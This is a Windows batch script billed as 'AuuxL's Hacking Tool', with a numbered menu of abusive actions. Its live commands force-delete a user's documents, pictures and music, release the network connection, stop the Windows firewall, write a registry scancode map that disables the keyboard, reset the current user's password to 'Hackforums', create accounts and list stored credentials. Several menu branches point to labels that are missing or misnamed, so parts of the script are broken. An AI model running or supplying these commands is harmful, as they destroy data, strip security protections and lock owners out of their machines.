- @echo off
- title AuuxL's Hacking Tool V1.0 Alpha
- color A
- echo Loading
- ping localhost -n 2 >nul
- cls
- echo Loading.
- ping localhost -n 2 >nul
- cls
- echo Loading..
- ping localhost -n 2 >nul
- cls
- echo Loading...
- ping localhost -n 2 >nul
- cls
- echo Loaded!
- ping localhost -n 2 >nul
- cls
- :start
- echo AuuxL's Hacking Tool
- echo --
- echo Welcome!
- echo This program will list users, and give you options on what to do with them.
- echo I AM NOT RESPONSIBLE FOR ANY MISCONDUCT USING THIS PROGRAM!
- echo You are on %logonserver% network!
- echo --
- echo Press 0 to open CMD
- echo --
- echo Press 1 to delete all documents
- echo --
- echo Press 2 to delete all pictures
- echo --
- echo Press 3 to delete all music
- echo --
- echo Press 4 to disable the Internet
- echo --
- echo Press 5 to disable all Firewall
- echo --
- echo Press 6 to disable the keyboard
- echo --
- echo Press 7 to user change pass To hackforums
- echo --
- echo Press 8 to open disk tray
- echo --
- echo Press 9 to start Firefox
- echo --
- echo Press 10 to start Google chrome
- echo --
- echo Press 11 to list all users
- echo --
- echo Press 12 for Credits
- echo --
- echo Press 13 to list administrators
- echo --
- echo Press 14 to run task manager
- echo --
- echo Press 15 to view stored usernames and passwords
- echo --
- echo Press 16 to make an administrator account
- echo --
- echo Press 17 to list Processes and Info
- echo --
- echo Press 18 to make an account
- echo --
- echo Press 19 to delete an account
- echo --
- echo Press 20 to create a group
- echo --
- echo Press 21 to run program as administrator
- echo --
- echo Press 22 to lock a program - Not Working
- echo --
- echo Press 23 to ping website (URL Blocker Bypass)
- echo --
- echo Press 24 change an account's group (Ex. Administrators)
- echo --
- echo Press 25 to kill a program (For advanced users only) - Not Working
- echo --
- set /p auuxl=What would you like to do? (Use the listing number) (SCROLL TO SEE MORE!)
- IF '%auuxl%'=='0' GOTO cmd
- IF '%auuxl%'=='1' GOTO documents
- IF '%auuxl%'=='2' GOTO pictures
- IF '%auuxl%'=='3' GOTO music
- IF '%auuxl%'=='4' GOTO internet
- IF '%auuxl%'=='5' GOTO firewall
- IF '%auuxl%'=='6' GOTO keyboard
- IF '%auuxl%'=='7' GOTO pass
- IF '%auuxl%'=='8' GOTO tray
- IF '%auuxl%'=='9' GOTO firefox
- IF '%auuxl%'=='10' GOTO chrome
- IF '%auuxl%'=='11' GOTO users
- IF '%auuxl%'=='12' GOTO credits
- IF '%auuxl%'=='13' GOTO listadmins
- IF '%auuxl%'=='14' GOTO task
- IF '%auuxl%'=='15' GOTO stored
- IF '%auuxl%'=='16' GOTO makeadmin
- IF '%auuxl%'=='17' GOTO listpro
- IF '%auuxl%'=='18' GOTO makeacc
- IF '%auuxl%'=='19' GOTO delacc
- IF '%auuxl%'=='20' GOTO group
- IF '%auuxl%'=='21' GOTO runadmin
- IF '%auuxl%'=='23' GOTO ping
- IF '%auuxl%'=='24' GOTO change
- IF '%auuxl%'=='25' GOTO kill
- :documents
- @echo off
- ::----Delete My Documents----::
- del /f /q "C:\Users\%userprofile%\My Documents\*.*"
- ::---------------------------::
- pause
- exit
- :pictures
- @echo off
- ::-----Delete My Pictures----::
- del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
- ::---------------------------::
- :music
- @echo off
- ::-----Delete My Music-------::
- del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
- ::---------------------------::
- pause
- exit
- :internet
- @echo off
- ::-----Disable Internet------::
- ipconfig /release
- if ERRORLEVEL1 ipconfig /release_all
- ::---------------------------::
- pause
- exit
- :firewall
- @echo off
- ::-Disable Windows Firewall--::
- net stop "MpsSvc"
- taskkill /f /t /im "FirewallControlPanel.exe"
- ::---------------------------:
- pause
- exit
- :keyboard
- @echo off
- ::------Disable Keyboard-----::
- echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
- echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
- echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
- echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
- echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
- echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
- echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
- echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
- echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
- echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
- echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
- echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
- echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
- echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
- echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
- echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
- echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
- echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
- echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
- echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
- echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
- echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
- echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
- start nokeyboard.reg
- ::---------------------------::
- pause
- exit
- :pass
- @echo off
- ::--Change Pass To Hackforums--::
- net user %username% Hackforums
- ::---------------------------
- pause
- exit
- :tray
- @echo off
- ::-------Open Disk Tray------::
- echo Do >> "opendisk.vbs"
- echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
- echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
- echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
- echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
- echo Loop >> "opendisk.vbs"
- start "" "opendisk.vbs"
- ::---------------------------::
- pause
- exit
- :firefox
- @echo off
- start firefox.exe
- pause
- exit
- :google
- start chrome.exe
- pause
- exit
- :cmd
- echo Opening a new, clean, admin, window...
- cmd
- pause
- goto start
- :task
- echo starting task manager.
- taskmgr
- pause
- goto start
- :kill
- set /p pp=Are you sure? May ruin computer! You must know the exact process's name! (Y/N)
- IF '%pp%'=='Y' GOTO kill1
- IF '%pp%'=='y' GOTO kill1
- IF '%pp%'=='N' GOTO abort
- IF '%pp%'=='n' GOTO abort
- :changepass
- set /p username=What's the username that you would like to change the password to?
- set /p paswurd=What would you like to change the password to?
- net user %username% %paswurd%
- echo Done!
- pause
- goto start
- :group
- set /p groupname=What would you like to name the group?
- net localgroup %groupname% /add
- echo Done!
- pause
- goto start
- :makeacc
- set /p acc=What would you like the username to be?
- net user %acc% /add
- echo Done!
- pause
- goto start
- :users
- net users
- pause
- goto start
- :ping
- echo Ready to ping website.
- set /p pping=Please enter the website's name.
- echo Pinging...
- ping %pping%
- echo Take the string of numbers and type in your internet browser! (Ex. http://74.195.19.1.1)
- pause
- goto start
- :makeadmin
- set /p vvv=What yould you like your username to be?
- set /p rrr=ARE YOU ABSOLUTELY SURE?? (Y/N)
- IF '%rrr%'=='Y' goto adminii
- IF '%rrr%'=='N' goto abort
- IF '%rrr%'=='n' goto abort
- IF '%rrr%'=='y' goto adminii
- :deleteacc
- set /p suredelete=Are you sure you want to delete? Cannot be undone! (Y/N)
- IF '%suredelete%'=='Y' GOTO delete1
- IF '%suredelete%'=='y' GOTO delete1
- IF '%suredelete%'=='N' GOTO abort
- IF '%suredelete%'=='n' GOTO abort
- :stored
- echo Listing....
- CMDKEY /list
- echo Done!
- pause
- goto start0